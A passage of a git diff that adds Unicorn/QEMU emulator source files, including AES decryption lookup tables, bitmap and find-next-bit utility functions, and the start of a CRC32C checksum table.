0x6fd52da9U, 0xcf2512b3U, + 0xc8ac993bU, 0x10187da7U, 0xe89c636eU, 0xdb3bbb7bU, + 0xcd267809U, 0x6e5918f4U, 0xec9ab701U, 0x834f9aa8U, + 0xe6956e65U, 0xaaffe67eU, 0x21bccf08U, 0xef15e8e6U, + 0xbae79bd9U, 0x4a6f36ceU, 0xea9f09d4U, 0x29b07cd6U, + 0x31a4b2afU, 0x2a3f2331U, 0xc6a59430U, 0x35a266c0U, + 0x744ebc37U, 0xfc82caa6U, 0xe090d0b0U, 0x33a7d815U, + 0xf104984aU, 0x41ecdaf7U, 0x7fcd500eU, 0x1791f62fU, + 0x764dd68dU, 0x43efb04dU, 0xccaa4d54U, 0xe49604dfU, + 0x9ed1b5e3U, 0x4c6a881bU, 0xc12c1fb8U, 0x4665517fU, + 0x9d5eea04U, 0x018c355dU, 0xfa877473U, 0xfb0b412eU, + 0xb3671d5aU, 0x92dbd252U, 0xe9105633U, 0x6dd64713U, + 0x9ad7618cU, 0x37a10c7aU, 0x59f8148eU, 0xeb133c89U, + 0xcea927eeU, 0xb761c935U, 0xe11ce5edU, 0x7a47b13cU, + 0x9cd2df59U, 0x55f2733fU, 0x1814ce79U, 0x73c737bfU, + 0x53f7cdeaU, 0x5ffdaa5bU, 0xdf3d6f14U, 0x7844db86U, + 0xcaaff381U, 0xb968c43eU, 0x3824342cU, 0xc2a3405fU, + 0x161dc372U, 0xbce2250cU, 0x283c498bU, 0xff0d9541U, + 0x39a80171U, 0x080cb3deU, 0xd8b4e49cU, 0x6456c190U, + 0x7bcb8461U, 0xd532b670U, 0x486c5c74U, 0xd0b85742U, +}; +const uint32_t AES_Td1[256] = { + 0x5051f4a7U, 0x537e4165U, 0xc31a17a4U, 0x963a275eU, + 0xcb3bab6bU, 0xf11f9d45U, 0xabacfa58U, 0x934be303U, + 0x552030faU, 0xf6ad766dU, 0x9188cc76U, 0x25f5024cU, + 0xfc4fe5d7U, 0xd7c52acbU, 0x80263544U, 0x8fb562a3U, + 0x49deb15aU, 0x6725ba1bU, 0x9845ea0eU, 0xe15dfec0U, + 0x02c32f75U, 0x12814cf0U, 0xa38d4697U, 0xc66bd3f9U, + 0xe7038f5fU, 0x9515929cU, 0xebbf6d7aU, 0xda955259U, + 0x2dd4be83U, 0xd3587421U, 0x2949e069U, 0x448ec9c8U, + 0x6a75c289U, 0x78f48e79U, 0x6b99583eU, 0xdd27b971U, + 0xb6bee14fU, 0x17f088adU, 0x66c920acU, 0xb47dce3aU, + 0x1863df4aU, 0x82e51a31U, 0x60975133U, 0x4562537fU, + 0xe0b16477U, 0x84bb6baeU, 0x1cfe81a0U, 0x94f9082bU, + 0x58704868U, 0x198f45fdU, 0x8794de6cU, 0xb7527bf8U, + 0x23ab73d3U, 0xe2724b02U, 0x57e31f8fU, 0x2a6655abU, + 0x07b2eb28U, 0x032fb5c2U, 0x9a86c57bU, 0xa5d33708U, + 0xf2302887U, 0xb223bfa5U, 0xba02036aU, 0x5ced1682U, + 0x2b8acf1cU, 0x92a779b4U, 0xf0f307f2U, 0xa14e69e2U, + 0xcd65daf4U, 0xd50605beU, 0x1fd13462U, 0x8ac4a6feU, + 0x9d342e53U, 0xa0a2f355U, 0x32058ae1U, 0x75a4f6ebU, + 0x390b83ecU, 0xaa4060efU, 0x065e719fU, 0x51bd6e10U, + 0xf93e218aU, 0x3d96dd06U, 0xaedd3e05U, 0x464de6bdU, + 0xb591548dU, 0x0571c45dU, 0x6f0406d4U, 0xff605015U, + 0x241998fbU, 0x97d6bde9U, 0xcc894043U, 0x7767d99eU, + 0xbdb0e842U, 0x8807898bU, 0x38e7195bU, 0xdb79c8eeU, + 0x47a17c0aU, 0xe97c420fU, 0xc9f8841eU, 0x00000000U, + 0x83098086U, 0x48322bedU, 0xac1e1170U, 0x4e6c5a72U, + 0xfbfd0effU, 0x560f8538U, 0x1e3daed5U, 0x27362d39U, + 0x640a0fd9U, 0x21685ca6U, 0xd19b5b54U, 0x3a24362eU, + 0xb10c0a67U, 0x0f9357e7U, 0xd2b4ee96U, 0x9e1b9b91U, + 0x4f80c0c5U, 0xa261dc20U, 0x695a774bU, 0x161c121aU, + 0x0ae293baU, 0xe5c0a02aU, 0x433c22e0U, 0x1d121b17U, + 0x0b0e090dU, 0xadf28bc7U, 0xb92db6a8U, 0xc8141ea9U, + 0x8557f119U, 0x4caf7507U, 0xbbee99ddU, 0xfda37f60U, + 0x9ff70126U, 0xbc5c72f5U, 0xc544663bU, 0x345bfb7eU, + 0x768b4329U, 0xdccb23c6U, 0x68b6edfcU, 0x63b8e4f1U, + 0xcad731dcU, 0x10426385U, 0x40139722U, 0x2084c611U, + 0x7d854a24U, 0xf8d2bb3dU, 0x11aef932U, 0x6dc729a1U, + 0x4b1d9e2fU, 0xf3dcb230U, 0xec0d8652U, 0xd077c1e3U, + 0x6c2bb316U, 0x99a970b9U, 0xfa119448U, 0x2247e964U, + 0xc4a8fc8cU, 0x1aa0f03fU, 0xd8567d2cU, 0xef223390U, + 0xc787494eU, 0xc1d938d1U, 0xfe8ccaa2U, 0x3698d40bU, + 0xcfa6f581U, 0x28a57adeU, 0x26dab78eU, 0xa43fadbfU, + 0xe42c3a9dU, 0x0d507892U, 0x9b6a5fccU, 0x62547e46U, + 0xc2f68d13U, 0xe890d8b8U, 0x5e2e39f7U, 0xf582c3afU, + 0xbe9f5d80U, 0x7c69d093U, 0xa96fd52dU, 0xb3cf2512U, + 0x3bc8ac99U, 0xa710187dU, 0x6ee89c63U, 0x7bdb3bbbU, + 0x09cd2678U, 0xf46e5918U, 0x01ec9ab7U, 0xa8834f9aU, + 0x65e6956eU, 0x7eaaffe6U, 0x0821bccfU, 0xe6ef15e8U, + 0xd9bae79bU, 0xce4a6f36U, 0xd4ea9f09U, 0xd629b07cU, + 0xaf31a4b2U, 0x312a3f23U, 0x30c6a594U, 0xc035a266U, + 0x37744ebcU, 0xa6fc82caU, 0xb0e090d0U, 0x1533a7d8U, + 0x4af10498U, 0xf741ecdaU, 0x0e7fcd50U, 0x2f1791f6U, + 0x8d764dd6U, 0x4d43efb0U, 0x54ccaa4dU, 0xdfe49604U, + 0xe39ed1b5U, 0x1b4c6a88U, 0xb8c12c1fU, 0x7f466551U, + 0x049d5eeaU, 0x5d018c35U, 0x73fa8774U, 0x2efb0b41U, + 0x5ab3671dU, 0x5292dbd2U, 0x33e91056U, 0x136dd647U, + 0x8c9ad761U, 0x7a37a10cU, 0x8e59f814U, 0x89eb133cU, + 0xeecea927U, 0x35b761c9U, 0xede11ce5U, 0x3c7a47b1U, + 0x599cd2dfU, 0x3f55f273U, 0x791814ceU, 0xbf73c737U, + 0xea53f7cdU, 0x5b5ffdaaU, 0x14df3d6fU, 0x867844dbU, + 0x81caaff3U, 0x3eb968c4U, 0x2c382434U, 0x5fc2a340U, + 0x72161dc3U, 0x0cbce225U, 0x8b283c49U, 0x41ff0d95U, + 0x7139a801U, 0xde080cb3U, 0x9cd8b4e4U, 0x906456c1U, + 0x617bcb84U, 0x70d532b6U, 0x74486c5cU, 0x42d0b857U, +}; +const uint32_t AES_Td2[256] = { + 0xa75051f4U, 0x65537e41U, 0xa4c31a17U, 0x5e963a27U, + 0x6bcb3babU, 0x45f11f9dU, 0x58abacfaU, 0x03934be3U, + 0xfa552030U, 0x6df6ad76U, 0x769188ccU, 0x4c25f502U, + 0xd7fc4fe5U, 0xcbd7c52aU, 0x44802635U, 0xa38fb562U, + 0x5a49deb1U, 0x1b6725baU, 0x0e9845eaU, 0xc0e15dfeU, + 0x7502c32fU, 0xf012814cU, 0x97a38d46U, 0xf9c66bd3U, + 0x5fe7038fU, 0x9c951592U, 0x7aebbf6dU, 0x59da9552U, + 0x832dd4beU, 0x21d35874U, 0x692949e0U, 0xc8448ec9U, + 0x896a75c2U, 0x7978f48eU, 0x3e6b9958U, 0x71dd27b9U, + 0x4fb6bee1U, 0xad17f088U, 0xac66c920U, 0x3ab47dceU, + 0x4a1863dfU, 0x3182e51aU, 0x33609751U, 0x7f456253U, + 0x77e0b164U, 0xae84bb6bU, 0xa01cfe81U, 0x2b94f908U, + 0x68587048U, 0xfd198f45U, 0x6c8794deU, 0xf8b7527bU, + 0xd323ab73U, 0x02e2724bU, 0x8f57e31fU, 0xab2a6655U, + 0x2807b2ebU, 0xc2032fb5U, 0x7b9a86c5U, 0x08a5d337U, + 0x87f23028U, 0xa5b223bfU, 0x6aba0203U, 0x825ced16U, + 0x1c2b8acfU, 0xb492a779U, 0xf2f0f307U, 0xe2a14e69U, + 0xf4cd65daU, 0xbed50605U, 0x621fd134U, 0xfe8ac4a6U, + 0x539d342eU, 0x55a0a2f3U, 0xe132058aU, 0xeb75a4f6U, + 0xec390b83U, 0xefaa4060U, 0x9f065e71U, 0x1051bd6eU, + + 0x8af93e21U, 0x063d96ddU, 0x05aedd3eU, 0xbd464de6U, + 0x8db59154U, 0x5d0571c4U, 0xd46f0406U, 0x15ff6050U, + 0xfb241998U, 0xe997d6bdU, 0x43cc8940U, 0x9e7767d9U, + 0x42bdb0e8U, 0x8b880789U, 0x5b38e719U, 0xeedb79c8U, + 0x0a47a17cU, 0x0fe97c42U, 0x1ec9f884U, 0x00000000U, + 0x86830980U, 0xed48322bU, 0x70ac1e11U, 0x724e6c5aU, + 0xfffbfd0eU, 0x38560f85U, 0xd51e3daeU, 0x3927362dU, + 0xd9640a0fU, 0xa621685cU, 0x54d19b5bU, 0x2e3a2436U, + 0x67b10c0aU, 0xe70f9357U, 0x96d2b4eeU, 0x919e1b9bU, + 0xc54f80c0U, 0x20a261dcU, 0x4b695a77U, 0x1a161c12U, + 0xba0ae293U, 0x2ae5c0a0U, 0xe0433c22U, 0x171d121bU, + 0x0d0b0e09U, 0xc7adf28bU, 0xa8b92db6U, 0xa9c8141eU, + 0x198557f1U, 0x074caf75U, 0xddbbee99U, 0x60fda37fU, + 0x269ff701U, 0xf5bc5c72U, 0x3bc54466U, 0x7e345bfbU, + 0x29768b43U, 0xc6dccb23U, 0xfc68b6edU, 0xf163b8e4U, + 0xdccad731U, 0x85104263U, 0x22401397U, 0x112084c6U, + 0x247d854aU, 0x3df8d2bbU, 0x3211aef9U, 0xa16dc729U, + 0x2f4b1d9eU, 0x30f3dcb2U, 0x52ec0d86U, 0xe3d077c1U, + 0x166c2bb3U, 0xb999a970U, 0x48fa1194U, 0x642247e9U, + 0x8cc4a8fcU, 0x3f1aa0f0U, 0x2cd8567dU, 0x90ef2233U, + 0x4ec78749U, 0xd1c1d938U, 0xa2fe8ccaU, 0x0b3698d4U, + 0x81cfa6f5U, 0xde28a57aU, 0x8e26dab7U, 0xbfa43fadU, + 0x9de42c3aU, 0x920d5078U, 0xcc9b6a5fU, 0x4662547eU, + 0x13c2f68dU, 0xb8e890d8U, 0xf75e2e39U, 0xaff582c3U, + 0x80be9f5dU, 0x937c69d0U, 0x2da96fd5U, 0x12b3cf25U, + 0x993bc8acU, 0x7da71018U, 0x636ee89cU, 0xbb7bdb3bU, + 0x7809cd26U, 0x18f46e59U, 0xb701ec9aU, 0x9aa8834fU, + 0x6e65e695U, 0xe67eaaffU, 0xcf0821bcU, 0xe8e6ef15U, + 0x9bd9bae7U, 0x36ce4a6fU, 0x09d4ea9fU, 0x7cd629b0U, + 0xb2af31a4U, 0x23312a3fU, 0x9430c6a5U, 0x66c035a2U, + 0xbc37744eU, 0xcaa6fc82U, 0xd0b0e090U, 0xd81533a7U, + 0x984af104U, 0xdaf741ecU, 0x500e7fcdU, 0xf62f1791U, + 0xd68d764dU, 0xb04d43efU, 0x4d54ccaaU, 0x04dfe496U, + 0xb5e39ed1U, 0x881b4c6aU, 0x1fb8c12cU, 0x517f4665U, + 0xea049d5eU, 0x355d018cU, 0x7473fa87U, 0x412efb0bU, + 0x1d5ab367U, 0xd25292dbU, 0x5633e910U, 0x47136dd6U, + 0x618c9ad7U, 0x0c7a37a1U, 0x148e59f8U, 0x3c89eb13U, + 0x27eecea9U, 0xc935b761U, 0xe5ede11cU, 0xb13c7a47U, + 0xdf599cd2U, 0x733f55f2U, 0xce791814U, 0x37bf73c7U, + 0xcdea53f7U, 0xaa5b5ffdU, 0x6f14df3dU, 0xdb867844U, + 0xf381caafU, 0xc43eb968U, 0x342c3824U, 0x405fc2a3U, + 0xc372161dU, 0x250cbce2U, 0x498b283cU, 0x9541ff0dU, + 0x017139a8U, 0xb3de080cU, 0xe49cd8b4U, 0xc1906456U, + 0x84617bcbU, 0xb670d532U, 0x5c74486cU, 0x5742d0b8U, +}; +const uint32_t AES_Td3[256] = { + 0xf4a75051U, 0x4165537eU, 0x17a4c31aU, 0x275e963aU, + 0xab6bcb3bU, 0x9d45f11fU, 0xfa58abacU, 0xe303934bU, + 0x30fa5520U, 0x766df6adU, 0xcc769188U, 0x024c25f5U, + 0xe5d7fc4fU, 0x2acbd7c5U, 0x35448026U, 0x62a38fb5U, + 0xb15a49deU, 0xba1b6725U, 0xea0e9845U, 0xfec0e15dU, + 0x2f7502c3U, 0x4cf01281U, 0x4697a38dU, 0xd3f9c66bU, + 0x8f5fe703U, 0x929c9515U, 0x6d7aebbfU, 0x5259da95U, + 0xbe832dd4U, 0x7421d358U, 0xe0692949U, 0xc9c8448eU, + 0xc2896a75U, 0x8e7978f4U, 0x583e6b99U, 0xb971dd27U, + 0xe14fb6beU, 0x88ad17f0U, 0x20ac66c9U, 0xce3ab47dU, + 0xdf4a1863U, 0x1a3182e5U, 0x51336097U, 0x537f4562U, + 0x6477e0b1U, 0x6bae84bbU, 0x81a01cfeU, 0x082b94f9U, + 0x48685870U, 0x45fd198fU, 0xde6c8794U, 0x7bf8b752U, + 0x73d323abU, 0x4b02e272U, 0x1f8f57e3U, 0x55ab2a66U, + 0xeb2807b2U, 0xb5c2032fU, 0xc57b9a86U, 0x3708a5d3U, + 0x2887f230U, 0xbfa5b223U, 0x036aba02U, 0x16825cedU, + 0xcf1c2b8aU, 0x79b492a7U, 0x07f2f0f3U, 0x69e2a14eU, + 0xdaf4cd65U, 0x05bed506U, 0x34621fd1U, 0xa6fe8ac4U, + 0x2e539d34U, 0xf355a0a2U, 0x8ae13205U, 0xf6eb75a4U, + 0x83ec390bU, 0x60efaa40U, 0x719f065eU, 0x6e1051bdU, + 0x218af93eU, 0xdd063d96U, 0x3e05aeddU, 0xe6bd464dU, + 0x548db591U, 0xc45d0571U, 0x06d46f04U, 0x5015ff60U, + 0x98fb2419U, 0xbde997d6U, 0x4043cc89U, 0xd99e7767U, + 0xe842bdb0U, 0x898b8807U, 0x195b38e7U, 0xc8eedb79U, + 0x7c0a47a1U, 0x420fe97cU, 0x841ec9f8U, 0x00000000U, + 0x80868309U, 0x2bed4832U, 0x1170ac1eU, 0x5a724e6cU, + 0x0efffbfdU, 0x8538560fU, 0xaed51e3dU, 0x2d392736U, + 0x0fd9640aU, 0x5ca62168U, 0x5b54d19bU, 0x362e3a24U, + 0x0a67b10cU, 0x57e70f93U, 0xee96d2b4U, 0x9b919e1bU, + 0xc0c54f80U, 0xdc20a261U, 0x774b695aU, 0x121a161cU, + 0x93ba0ae2U, 0xa02ae5c0U, 0x22e0433cU, 0x1b171d12U, + 0x090d0b0eU, 0x8bc7adf2U, 0xb6a8b92dU, 0x1ea9c814U, + 0xf1198557U, 0x75074cafU, 0x99ddbbeeU, 0x7f60fda3U, + 0x01269ff7U, 0x72f5bc5cU, 0x663bc544U, 0xfb7e345bU, + 0x4329768bU, 0x23c6dccbU, 0xedfc68b6U, 0xe4f163b8U, + 0x31dccad7U, 0x63851042U, 0x97224013U, 0xc6112084U, + 0x4a247d85U, 0xbb3df8d2U, 0xf93211aeU, 0x29a16dc7U, + 0x9e2f4b1dU, 0xb230f3dcU, 0x8652ec0dU, 0xc1e3d077U, + 0xb3166c2bU, 0x70b999a9U, 0x9448fa11U, 0xe9642247U, + 0xfc8cc4a8U, 0xf03f1aa0U, 0x7d2cd856U, 0x3390ef22U, + 0x494ec787U, 0x38d1c1d9U, 0xcaa2fe8cU, 0xd40b3698U, + 0xf581cfa6U, 0x7ade28a5U, 0xb78e26daU, 0xadbfa43fU, + 0x3a9de42cU, 0x78920d50U, 0x5fcc9b6aU, 0x7e466254U, + 0x8d13c2f6U, 0xd8b8e890U, 0x39f75e2eU, 0xc3aff582U, + 0x5d80be9fU, 0xd0937c69U, 0xd52da96fU, 0x2512b3cfU, + 0xac993bc8U, 0x187da710U, 0x9c636ee8U, 0x3bbb7bdbU, + 0x267809cdU, 0x5918f46eU, 0x9ab701ecU, 0x4f9aa883U, + 0x956e65e6U, 0xffe67eaaU, 0xbccf0821U, 0x15e8e6efU, + 0xe79bd9baU, 0x6f36ce4aU, 0x9f09d4eaU, 0xb07cd629U, + 0xa4b2af31U, 0x3f23312aU, 0xa59430c6U, 0xa266c035U, + 0x4ebc3774U, 0x82caa6fcU, 0x90d0b0e0U, 0xa7d81533U, + 0x04984af1U, 0xecdaf741U, 0xcd500e7fU, 0x91f62f17U, + 0x4dd68d76U, 0xefb04d43U, 0xaa4d54ccU, 0x9604dfe4U, + 0xd1b5e39eU, 0x6a881b4cU, 0x2c1fb8c1U, 0x65517f46U, + 0x5eea049dU, 0x8c355d01U, 0x877473faU, 0x0b412efbU, + 0x671d5ab3U, 0xdbd25292U, 0x105633e9U, 0xd647136dU, + 0xd7618c9aU, 0xa10c7a37U, 0xf8148e59U, 0x133c89ebU, + 0xa927eeceU, 0x61c935b7U, 0x1ce5ede1U, 0x47b13c7aU, + 0xd2df599cU, 0xf2733f55U, 0x14ce7918U, 0xc737bf73U, + 0xf7cdea53U, 0xfdaa5b5fU, 0x3d6f14dfU, 0x44db8678U, + 0xaff381caU, 0x68c43eb9U, 0x24342c38U, 0xa3405fc2U, + 0x1dc37216U, 0xe2250cbcU, 0x3c498b28U, 0x0d9541ffU, + 0xa8017139U, 0x0cb3de08U, 0xb4e49cd8U, 0x56c19064U, + 0xcb84617bU, 0x32b670d5U, 0x6c5c7448U, 0xb85742d0U, +}; +const uint32_t AES_Td4[256] = { + 0x52525252U, 0x09090909U, 0x6a6a6a6aU, 0xd5d5d5d5U, + 0x30303030U, 0x36363636U, 0xa5a5a5a5U, 0x38383838U, + 0xbfbfbfbfU, 0x40404040U, 0xa3a3a3a3U, 0x9e9e9e9eU, + 0x81818181U, 0xf3f3f3f3U, 0xd7d7d7d7U, 0xfbfbfbfbU, + 0x7c7c7c7cU, 0xe3e3e3e3U, 0x39393939U, 0x82828282U, + 0x9b9b9b9bU, 0x2f2f2f2fU, 0xffffffffU, 0x87878787U, + 0x34343434U, 0x8e8e8e8eU, 0x43434343U, 0x44444444U, + 0xc4c4c4c4U, 0xdedededeU, 0xe9e9e9e9U, 0xcbcbcbcbU, + 0x54545454U, 0x7b7b7b7bU, 0x94949494U, 0x32323232U, + 0xa6a6a6a6U, 0xc2c2c2c2U, 0x23232323U, 0x3d3d3d3dU, + 0xeeeeeeeeU, 0x4c4c4c4cU, 0x95959595U, 0x0b0b0b0bU, + 0x42424242U, 0xfafafafaU, 0xc3c3c3c3U, 0x4e4e4e4eU, + 0x08080808U, 0x2e2e2e2eU, 0xa1a1a1a1U, 0x66666666U, + 0x28282828U, 0xd9d9d9d9U, 0x24242424U, 0xb2b2b2b2U, + 0x76767676U, 0x5b5b5b5bU, 0xa2a2a2a2U, 0x49494949U, + 0x6d6d6d6dU, 0x8b8b8b8bU, 0xd1d1d1d1U, 0x25252525U, + 0x72727272U, 0xf8f8f8f8U, 0xf6f6f6f6U, 0x64646464U, + 0x86868686U, 0x68686868U, 0x98989898U, 0x16161616U, + 0xd4d4d4d4U, 0xa4a4a4a4U, 0x5c5c5c5cU, 0xccccccccU, + 0x5d5d5d5dU, 0x65656565U, 0xb6b6b6b6U, 0x92929292U, + 0x6c6c6c6cU, 0x70707070U, 0x48484848U, 0x50505050U, + 0xfdfdfdfdU, 0xededededU, 0xb9b9b9b9U, 0xdadadadaU, + 0x5e5e5e5eU, 0x15151515U, 0x46464646U, 0x57575757U, + 0xa7a7a7a7U, 0x8d8d8d8dU, 0x9d9d9d9dU, 0x84848484U, + 0x90909090U, 0xd8d8d8d8U, 0xababababU, 0x00000000U, + 0x8c8c8c8cU, 0xbcbcbcbcU, 0xd3d3d3d3U, 0x0a0a0a0aU, + 0xf7f7f7f7U, 0xe4e4e4e4U, 0x58585858U, 0x05050505U, + 0xb8b8b8b8U, 0xb3b3b3b3U, 0x45454545U, 0x06060606U, + 0xd0d0d0d0U, 0x2c2c2c2cU, 0x1e1e1e1eU, 0x8f8f8f8fU, + 0xcacacacaU, 0x3f3f3f3fU, 0x0f0f0f0fU, 0x02020202U, + 0xc1c1c1c1U, 0xafafafafU, 0xbdbdbdbdU, 0x03030303U, + 0x01010101U, 0x13131313U, 0x8a8a8a8aU, 0x6b6b6b6bU, + 0x3a3a3a3aU, 0x91919191U, 0x11111111U, 0x41414141U, + 0x4f4f4f4fU, 0x67676767U, 0xdcdcdcdcU, 0xeaeaeaeaU, + 0x97979797U, 0xf2f2f2f2U, 0xcfcfcfcfU, 0xcecececeU, + 0xf0f0f0f0U, 0xb4b4b4b4U, 0xe6e6e6e6U, 0x73737373U, + 0x96969696U, 0xacacacacU, 0x74747474U, 0x22222222U, + 0xe7e7e7e7U, 0xadadadadU, 0x35353535U, 0x85858585U, + 0xe2e2e2e2U, 0xf9f9f9f9U, 0x37373737U, 0xe8e8e8e8U, + 0x1c1c1c1cU, 0x75757575U, 0xdfdfdfdfU, 0x6e6e6e6eU, + 0x47474747U, 0xf1f1f1f1U, 0x1a1a1a1aU, 0x71717171U, + 0x1d1d1d1dU, 0x29292929U, 0xc5c5c5c5U, 0x89898989U, + 0x6f6f6f6fU, 0xb7b7b7b7U, 0x62626262U, 0x0e0e0e0eU, + 0xaaaaaaaaU, 0x18181818U, 0xbebebebeU, 0x1b1b1b1bU, + 0xfcfcfcfcU, 0x56565656U, 0x3e3e3e3eU, 0x4b4b4b4bU, + 0xc6c6c6c6U, 0xd2d2d2d2U, 0x79797979U, 0x20202020U, + 0x9a9a9a9aU, 0xdbdbdbdbU, 0xc0c0c0c0U, 0xfefefefeU, + 0x78787878U, 0xcdcdcdcdU, 0x5a5a5a5aU, 0xf4f4f4f4U, + 0x1f1f1f1fU, 0xddddddddU, 0xa8a8a8a8U, 0x33333333U, + 0x88888888U, 0x07070707U, 0xc7c7c7c7U, 0x31313131U, + 0xb1b1b1b1U, 0x12121212U, 0x10101010U, 0x59595959U, + 0x27272727U, 0x80808080U, 0xececececU, 0x5f5f5f5fU, + 0x60606060U, 0x51515151U, 0x7f7f7f7fU, 0xa9a9a9a9U, + 0x19191919U, 0xb5b5b5b5U, 0x4a4a4a4aU, 0x0d0d0d0dU, + 0x2d2d2d2dU, 0xe5e5e5e5U, 0x7a7a7a7aU, 0x9f9f9f9fU, + 0x93939393U, 0xc9c9c9c9U, 0x9c9c9c9cU, 0xefefefefU, + 0xa0a0a0a0U, 0xe0e0e0e0U, 0x3b3b3b3bU, 0x4d4d4d4dU, + 0xaeaeaeaeU, 0x2a2a2a2aU, 0xf5f5f5f5U, 0xb0b0b0b0U, + 0xc8c8c8c8U, 0xebebebebU, 0xbbbbbbbbU, 0x3c3c3c3cU, + 0x83838383U, 0x53535353U, 0x99999999U, 0x61616161U, + 0x17171717U, 0x2b2b2b2bU, 0x04040404U, 0x7e7e7e7eU, + 0xbabababaU, 0x77777777U, 0xd6d6d6d6U, 0x26262626U, + 0xe1e1e1e1U, 0x69696969U, 0x14141414U, 0x63636363U, + 0x55555555U, 0x21212121U, 0x0c0c0c0cU, 0x7d7d7d7dU, +}; diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitmap.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitmap.c new file mode 100644 index 0000000..f6b9cdc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitmap.c @@ -0,0 +1,55 @@ +/* + * Bitmap Module + * + * Stolen from linux/src/lib/bitmap.c + * + * Copyright (C) 2010 Corentin Chary + * + * This source code is licensed under the GNU General Public License, + * Version 2. + */ + +#include "qemu/bitops.h" +#include "qemu/bitmap.h" + +#define BITMAP_FIRST_WORD_MASK(start) (~0UL << ((start) % BITS_PER_LONG)) + +void qemu_bitmap_set(unsigned long *map, long start, long nr) +{ + unsigned long *p = map + BIT_WORD(start); + const long size = start + nr; + int bits_to_set = BITS_PER_LONG - (start % BITS_PER_LONG); + unsigned long mask_to_set = BITMAP_FIRST_WORD_MASK(start); + + while (nr - bits_to_set >= 0) { + *p |= mask_to_set; + nr -= bits_to_set; + bits_to_set = BITS_PER_LONG; + mask_to_set = ~0UL; + p++; + } + if (nr) { + mask_to_set &= BITMAP_LAST_WORD_MASK(size); + *p |= mask_to_set; + } +} + +void qemu_bitmap_clear(unsigned long *map, long start, long nr) +{ + unsigned long *p = map + BIT_WORD(start); + const long size = start + nr; + int bits_to_clear = BITS_PER_LONG - (start % BITS_PER_LONG); + unsigned long mask_to_clear = BITMAP_FIRST_WORD_MASK(start); + + while (nr - bits_to_clear >= 0) { + *p &= ~mask_to_clear; + nr -= bits_to_clear; + bits_to_clear = BITS_PER_LONG; + mask_to_clear = ~0UL; + p++; + } + if (nr) { + mask_to_clear &= BITMAP_LAST_WORD_MASK(size); + *p &= ~mask_to_clear; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitops.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitops.c new file mode 100644 index 0000000..f1641bf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitops.c @@ -0,0 +1,129 @@ +/* + * Copyright (C) 2004 Red Hat, Inc. All Rights Reserved. + * Written by David Howells (dhowells@redhat.com) + * Copyright (C) 2008 IBM Corporation + * Written by Rusty Russell + * (Inspired by David Howell's find_next_bit implementation) + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version + * 2 of the License, or (at your option) any later version. + */ + +#include "qemu/bitops.h" + +#define BITOP_WORD(nr) ((nr) / BITS_PER_LONG) + +/* + * Find the next set bit in a memory region. + */ +unsigned long find_next_bit(const unsigned long *addr, unsigned long size, + unsigned long offset) +{ + const unsigned long *p = addr + BITOP_WORD(offset); + unsigned long result = offset & ~(BITS_PER_LONG-1); + unsigned long tmp; + + if (offset >= size) { + return size; + } + size -= result; + offset %= BITS_PER_LONG; + if (offset) { + tmp = *(p++); + tmp &= (~0UL << offset); + if (size < BITS_PER_LONG) { + goto found_first; + } + if (tmp) { + goto found_middle; + } + size -= BITS_PER_LONG; + result += BITS_PER_LONG; + } + while (size >= 4*BITS_PER_LONG) { + unsigned long d1, d2, d3; + tmp = *p; + d1 = *(p+1); + d2 = *(p+2); + d3 = *(p+3); + if (tmp) { + goto found_middle; + } + if (d1 | d2 | d3) { + break; + } + p += 4; + result += 4*BITS_PER_LONG; + size -= 4*BITS_PER_LONG; + } + while (size >= BITS_PER_LONG) { + if ((tmp = *(p++))) { + goto found_middle; + } + result += BITS_PER_LONG; + size -= BITS_PER_LONG; + } + if (!size) { + return result; + } + tmp = *p; + +found_first: + tmp &= (~0UL >> (BITS_PER_LONG - size)); + if (tmp == 0UL) { /* Are any bits set? */ + return result + size; /* Nope. */ + } +found_middle: + return result + ctzl(tmp); +} + +/* + * This implementation of find_{first,next}_zero_bit was stolen from + * Linus' asm-alpha/bitops.h. + */ +unsigned long find_next_zero_bit(const unsigned long *addr, unsigned long size, + unsigned long offset) +{ + const unsigned long *p = addr + BITOP_WORD(offset); + unsigned long result = offset & ~(BITS_PER_LONG-1); + unsigned long tmp; + + if (offset >= size) { + return size; + } + size -= result; + offset %= BITS_PER_LONG; + if (offset) { + tmp = *(p++); + tmp |= ~0UL >> (BITS_PER_LONG - offset); + if (size < BITS_PER_LONG) { + goto found_first; + } + if (~tmp) { + goto found_middle; + } + size -= BITS_PER_LONG; + result += BITS_PER_LONG; + } + while (size & ~(BITS_PER_LONG-1)) { + if (~(tmp = *(p++))) { + goto found_middle; + } + result += BITS_PER_LONG; + size -= BITS_PER_LONG; + } + if (!size) { + return result; + } + tmp = *p; + +found_first: + tmp |= ~0UL << size; + if (tmp == ~0UL) { /* Are any bits zero? */ + return result + size; /* Nope. */ + } +found_middle: + return result + ctzl(~tmp); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/crc32c.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/crc32c.c new file mode 100644 index 0000000..8866327 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/crc32c.c @@ -0,0 +1,115 @@ +/* + * Castagnoli CRC32C Checksum Algorithm + * + * Polynomial: 0x11EDC6F41 + * + * Castagnoli93: Guy Castagnoli and Stefan Braeuer and Martin Herrman + * "Optimization of Cyclic Redundancy-Check Codes with 24 + * and 32 Parity Bits",IEEE Transactions on Communication, + * Volume 41, Number 6, June 1993 + * + * Copyright (c) 2013 Red Hat, Inc., + * + * Authors: + * Jeff Cody + * + * Based on the Linux kernel cryptographic crc32c module, + * + * Copyright (c) 2004 Cisco Systems, Inc. + * Copyright (c) 2008 Herbert Xu + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the Free + * Software Foundation; either version 2 of the License, or (at your option) + * any later version. + * + */ + +#include "qemu-common.h" +#include "qemu/crc32c.h" + +/* + * This is the CRC-32C table + * Generated with: + * width = 32 bits + * poly = 0x1EDC6F41 + * reflect input bytes = true + * reflect output bytes = true + */ + +static const uint32_t crc32c_table[256] = { + 0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L, + 0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 